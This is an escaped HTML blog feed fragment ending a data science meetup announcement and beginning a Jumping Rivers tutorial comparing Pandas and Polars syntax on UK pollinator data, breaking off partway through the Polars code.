&lt;p&gt;To sign up to our mailing lists, please join the &lt;a href="https://www.meetup.com/newcastle-upon-tyne-data-science-meetup/" rel="external"&gt;North East Data Scientists&lt;/a&gt; and &lt;a href="https://www.meetup.com/leeds-data-science-meetup/" rel="external"&gt;Leeds Data Science Meetup&lt;/a&gt; communities. A meetup.com account is free to set up, and you will have access to lots of great local meetups (not just data science). You will then be notified about upcoming meetups that are taking place from communities that you are a member of.&lt;/p&gt;
&lt;p&gt;Although our events are free to attend, we still require you to register in advance via meetup.com so that we have an idea of numbers when planning the room setup and catering.&lt;/p&gt;
&lt;p&gt;We are always on the look out for speakers and workshop organisers! If you would like to volunteer yourself for a talk or workshop, or have any announcements to share with the community about job opportunities and events, please reach out to the following addresses:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="mailto:neds@jumpingrivers.com" rel="external"&gt;neds@jumpingrivers.com&lt;/a&gt; for the NEDS organising team.&lt;/li&gt;
&lt;li&gt;&lt;a href="mailto:lds@jumpingrivers.com" rel="external"&gt;lds@jumpingrivers.com&lt;/a&gt; for the LeeDS organising team.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We can&amp;rsquo;t wait to hear from you!&lt;/p&gt;
&lt;h2 id="contributing-to-the-data-science-community"&gt;Contributing to the data science community&lt;/h2&gt;
&lt;p&gt;Hosting meetups is just one of our ways of contributing to the data science community.&lt;/p&gt;
&lt;p&gt;Over the past few years we have also been organising an annual Shiny In Production conference. This typically involves a half day of workshops followed by a full day of talks from prominent speakers on all things Shiny and web dashboards. Check out our recent &lt;a href="https://www.jumpingrivers.com/blog/sip2025-shiny-conference-summary/"&gt;Shiny In Production 2025 highlights blog&lt;/a&gt; to find out about our latest conference that ran in October.&lt;/p&gt;
&lt;p&gt;Next year will be particularly exciting, as we organise our first ever &lt;strong&gt;AI In Production&lt;/strong&gt; conference (4-5 June 2026). This will take a similar format with a day of workshops followed by a day of talks. Expect topics including LLMs and MLOps. For more details about this and how to sign up, check out the Eventbrite listing &lt;a href="https://www.eventbrite.co.uk/e/ai-in-production-registration-1777831163869?aff=ebdssbcategorybrowse" rel="external"&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;We also organise a free monthly webinar series. Check out &lt;a href="https://www.jumpingrivers.com/blog/jumping-rivers-webinar-launch/"&gt;this blog&lt;/a&gt; with details of what to expect and how to sign up.&lt;/p&gt;
&lt;p&gt;Finally, we also develop software that is freely available to the data science community. Have you heard of &lt;a href="https://diffify.com/" rel="external"&gt;diffify.com&lt;/a&gt;? This is a free-to-use website that we have developed internally, which allows you to compare any two versions of your favourite R or Python packages. We are proud of how diffify has grown over the years, and are excited to bring you more updates very soon, so stay tuned!&lt;/p&gt;
&lt;p&gt;That&amp;rsquo;s all for this post. We look forward to seeing some new faces at our data science meetups in the near future!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/data-science-meetups-community/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Polars and Pandas - Working with the Data-Frame</title><link>https://www.jumpingrivers.com/blog/python-df-syntax/</link><pubDate>Thu, 06 Nov 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/python-df-syntax/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/python-df-syntax/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/python-df-syntax/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Biodiversity.
We&amp;rsquo;d like more of it.
More of each thing, and more different types of thing.
And more of the things that help make more of the different types of thing.&lt;/p&gt;
&lt;p&gt;But can you have too many things?&lt;/p&gt;
&lt;p&gt;In Data Science we are often working with rectangular data structures - databases, spreadsheets,
data-frames. Within Python alone, there are multiple ways to work with this type of data, and your
choice is constrained by data volume, storage, fluency and so on. For datasets that could readily be
held in memory on a single computer, the standard Python tool for rectangling is
&lt;a href="https://pandas.pydata.org/" rel="external"&gt;Pandas&lt;/a&gt;,
which became an open-source project in 2009. Many other tools now exist though.
In particular, the
&lt;a href="https://pola.rs/" rel="external"&gt;Polars&lt;/a&gt; library has become extremely popular in Python over recent years.
But when Pandas works, is well-supported, and is the standard tool in your team or your domain,
and if you are primarily working with in-memory datasets, is there a value in learning a new
data-wrangling tool? Of course there is.&lt;/p&gt;
&lt;p&gt;But this is a blog post, not a course, so what we&amp;rsquo;ll do here is compare the Pandas and Polars syntax
for some standard data-manipulation code. We will also introduce a new bit of syntax that Pandas
3.0 will be introducing soon.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Whether you want to start from scratch, or improve your skills, &lt;a href="https://www.jumpingrivers.com/training/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2025-python-df-syntax"&gt;Jumping Rivers has a training course for you&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;p&gt;Let&amp;rsquo;s talk about pollinators.&lt;/p&gt;
&lt;p&gt;
There's a nice dataset about pollinators and plants found in areas of the UK available
on the
&lt;a href="https://catalogue.ceh.ac.uk/documents/4a565007-d3a1-468d-9f84-70ec7594fafe"&gt;UK Centre for Ecology and Hydrology (UKCEH) website&lt;/a&gt;.
See the full citation below. Briefly, the dataset contains counts of different types of pollinators
in a range of 1 km&lt;sup&gt;2&lt;/sup&gt; grids across the UK. With it, we can see trends over time in pollinator
numbers.
&lt;/p&gt;
&lt;h3 id="installation"&gt;Installation&lt;/h3&gt;
&lt;p&gt;We will use separate &lt;a href="https://docs.astral.sh/uv/" rel="external"&gt;&amp;lsquo;uv&amp;rsquo;-based&lt;/a&gt; projects to analyse the UKCEH dataset,
by installing Polars, Pandas 2 and Pandas 3 into different virtual environments. See our recent
summary of
&lt;a href="https://www.jumpingrivers.com/blog/whats-new-py314/" rel="external"&gt;2025-trends in Python&lt;/a&gt; to get more information
about &amp;lsquo;uv&amp;rsquo;.&lt;/p&gt;
&lt;p&gt;Let&amp;rsquo;s install some bears inside a snake and analyse some bees:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Make separate environments for pandas2, pandas3, polars:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;uv init pandas2
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;cd pandas2
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;uv add &lt;span style="color:#a5d6ff"&gt;&amp;#34;pandas==2.3.3&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;uv run python -c &lt;span style="color:#a5d6ff"&gt;&amp;#34;import pandas; print(pandas.__version__)&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# 2.3.3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;cd ..
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;For Pandas 3, we are going to install a development version of the package. One way to do this in uv is using &lt;code&gt;uv pip install&lt;/code&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;uv init pandas3
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;cd pandas3
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;uv venv &lt;span style="color:#8b949e;font-style:italic"&gt;# explicitly initialise the virtual env&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;uv pip install --pre &lt;span style="color:#79c0ff"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;&lt;/span&gt; --extra-index-url https://pypi.anaconda.org/scientific-python-nightly-wheels/simple &lt;span style="color:#79c0ff"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;&lt;/span&gt; pandas
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Resolved 5 packages in 2.35s&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Installed 5 packages in 31ms&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# + numpy==2.4.0.dev0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# + pandas==3.0.0.dev0+2562.ga329dc353a&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# + python-dateutil==2.9.0.post0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# + six==1.17.0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# + tzdata==2025.2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# (Note this venv isn&amp;#39;t managed by uv...)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;uv run python -c &lt;span style="color:#a5d6ff"&gt;&amp;#34;import pandas; print(pandas.__version__)&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# 3.0.0.dev0+2562.ga329dc353a&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;cd ..
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Finally, we&amp;rsquo;ll install &lt;code&gt;polars&lt;/code&gt; into a separate project.
I&amp;rsquo;ve called this project &lt;code&gt;polars-proj&lt;/code&gt;.
If the project had been called &lt;code&gt;polars&lt;/code&gt;, we couldn&amp;rsquo;t have installed
the polars package within it.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# We can&amp;#39;t call this project &amp;#39;polars&amp;#39;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# as we&amp;#39;ll be installing the &amp;#39;polars&amp;#39; package inside it&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;uv init polars-proj
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;cd polars-proj
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;uv add &lt;span style="color:#a5d6ff"&gt;&amp;#34;polars==1.34.0&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;cd ../
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;So we now have three different projects (&amp;lsquo;pandas2&amp;rsquo;, &amp;lsquo;pandas3&amp;rsquo;, and &amp;lsquo;polars-proj&amp;rsquo;).&lt;/p&gt;
&lt;h2 id="download-the-data"&gt;Download the data&lt;/h2&gt;
&lt;p&gt;Data was downloaded from
&lt;a href="https://catalogue.ceh.ac.uk/documents/4a565007-d3a1-468d-9f84-70ec7594fafe" rel="external"&gt;ceh.ac.uk&lt;/a&gt;
and stored in &lt;code&gt;./data/ukpoms_1kmpantrapdata_2017-2022_insects.csv&lt;/code&gt;
See the citation below if you wish to work with this data.&lt;/p&gt;
&lt;p&gt;As of the start of November 2025, this dataset has been downloaded 29 times.&lt;/p&gt;
&lt;h2 id="data-processing"&gt;Data processing&lt;/h2&gt;
&lt;h3 id="pandas-2"&gt;Pandas 2&lt;/h3&gt;
&lt;p&gt;Pandas 2 is a well-known Python syntax for data-frame work.
From the &lt;code&gt;pandas2&lt;/code&gt; project, we can open a Jupyter notebook based on the pandas2 virtual environment:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# [bash]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;uv run --with jupyter jupyter lab
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We will read in the data and then make some summaries, to produce an output table:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pandas&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pd&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pollinators &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;read_csv(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;../data/ukpoms_1kmpantrapdata_2017-2022_insects.csv&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; encoding&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;ISO-8859-1&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Bees, and related species, are from the order &amp;ldquo;Hymenoptera&amp;rdquo;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;bees &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pollinators[pollinators[&lt;span style="color:#a5d6ff"&gt;&amp;#34;order&amp;#34;&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Hymenoptera&amp;#34;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# 9245 rows, 16 columns&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Within &lt;code&gt;bees&lt;/code&gt; we find a range of interestingly-named insects: nomad bees, small shaggy bees, the
impunctate mini-miner, a few Buffish mining bees and a clutch of heather girdled Colletes, amongst
others. So I&amp;rsquo;m wondering how many bees and how many different species are observed in a given
sector.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;bees[&lt;span style="color:#a5d6ff"&gt;&amp;#34;english_name&amp;#34;&lt;/span&gt;]&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;unique()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# array([&amp;#39;Common Yellow-face Bee&amp;#39;, &amp;#39;Red-tailed Bumblebee&amp;#39;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# &amp;#39;Common Carder Bee&amp;#39;, &amp;#39;Bloomed Furrow Bee&amp;#39;, ...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;
We have a &lt;code&gt;sample_id&lt;/code&gt; and an &lt;code&gt;occurrence_id&lt;/code&gt; column. There may be multiple rows with the same
&lt;code&gt;sample_id&lt;/code&gt;, but each row has a unique &lt;code&gt;occurrence_id&lt;/code&gt;. The &lt;code&gt;sample_id&lt;/code&gt; defines the
1 km&lt;sup&gt;2&lt;/sup&gt; sector in which a given pollinator count was performed - there are multiple rows, because there are
typically multiple pollinators present in a sector. Any given &lt;code&gt;sample_id&lt;/code&gt; is present for only one
year (not shown).
&lt;/p&gt;
&lt;p&gt;So what we want to do is group the dataset by &lt;code&gt;sample_id&lt;/code&gt; and count up the bees within that sector.
We will store the year along with the &lt;code&gt;sample_id&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;We can count up the observations in each sector as follows. Here we are summing the number of
observed insects (aggregating the &amp;lsquo;count&amp;rsquo; column using the &amp;lsquo;sum&amp;rsquo; function) and counting the number
of distinct taxa in the sector (the length of the unique entries in the &lt;code&gt;taxon_standardised&lt;/code&gt; column).&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;bee_counts &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; (
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; bees
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;groupby([&lt;span style="color:#a5d6ff"&gt;&amp;#34;sample_id&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;year&amp;#34;&lt;/span&gt;])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;agg({
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;count&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#34;sum&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;taxon_standardised&amp;#34;&lt;/span&gt;: &lt;span style="color:#ff7b72"&gt;lambda&lt;/span&gt; x: len(x&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;unique())
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; })
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;rename(columns&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;{
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;count&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#34;n_insects&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;taxon_standardised&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#34;n_species&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; })
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;With that, we can view the sectors that had the most bees overall:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;bee_counts&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;sort_values(&lt;span style="color:#a5d6ff"&gt;&amp;#34;n_insects&amp;#34;&lt;/span&gt;, ascending&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;False&lt;/span&gt;)&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;head()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# n_insects n_species&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# sample_id year &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# 14940524 2021 28 3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# 15465304 2021 28 5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# 6810184 2019 28 1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;And that had the most bee diversity:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;bee_counts&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;sort_values(&lt;span style="color:#a5d6ff"&gt;&amp;#34;n_species&amp;#34;&lt;/span&gt;, ascending&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;False&lt;/span&gt;)&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;head()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# n_insects n_species&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# sample_id year &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# 11873611 2020 25 11&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# 4440178 2018 20 11&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# 11745253 2020 24 11&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;You could do considerably more advanced analysis if you had time.&lt;/p&gt;
&lt;h3 id="polars"&gt;Polars&lt;/h3&gt;
&lt;p&gt;We will repeat the above, but using syntax typical for the Polars package.&lt;/p&gt;
&lt;p&gt;The syntax for subsetting the rows of a data-frame is different in Polars.
Passing a Boolean data-mask, &lt;code&gt;pollinators[pollinators[&amp;quot;order&amp;quot;] == &amp;quot;Hymenoptera&amp;quot;]&lt;/code&gt;, doesn&amp;rsquo;t work
in Polars and the printed error will recommend you use the &lt;code&gt;.filter()&lt;/code&gt; method instead:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;bees &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; (
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; pollinators
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;filter(pl&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;col(&lt;span style="color:#a5d6ff"&gt;&amp;#34;order&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Hymenoptera&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Inside a data-frame method (like &lt;code&gt;.filter()&lt;/code&gt;) we can refer to a column using
&lt;code&gt;pl.col(&amp;quot;column_name&amp;quot;)&lt;/code&gt;. This means we don&amp;rsquo;t have to precompute a data-mask on a concrete
data-frame, and can implicitly refer to a column in the current state of the data-frame (in Pandas,
&lt;code&gt;pollinators[&amp;quot;order&amp;quot;] == &amp;quot;Hymenoptera&amp;quot;&lt;/code&gt; returns a Series of Boolean values that can be used to
index into the rows of a data-frame; this logical series is a &amp;ldquo;data-mask&amp;rdquo;). So we
can chain filtering steps together.&lt;/p&gt;
&lt;p&gt;The syntax for grouping and summarising data is similar to the Pandas syntax but, again, we can
refer to columns using &lt;code&gt;pl.col()&lt;/code&gt;. By providing named arguments to &lt;code&gt;.agg()&lt;/code&gt; the names of the
output columns can be defined in a single step.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;bee_counts &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; (
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; bees
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;group_by([&lt;span style="color:#a5d6ff"&gt;&amp;#34;sample_id&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;year&amp;#34;&lt;/span&gt;])
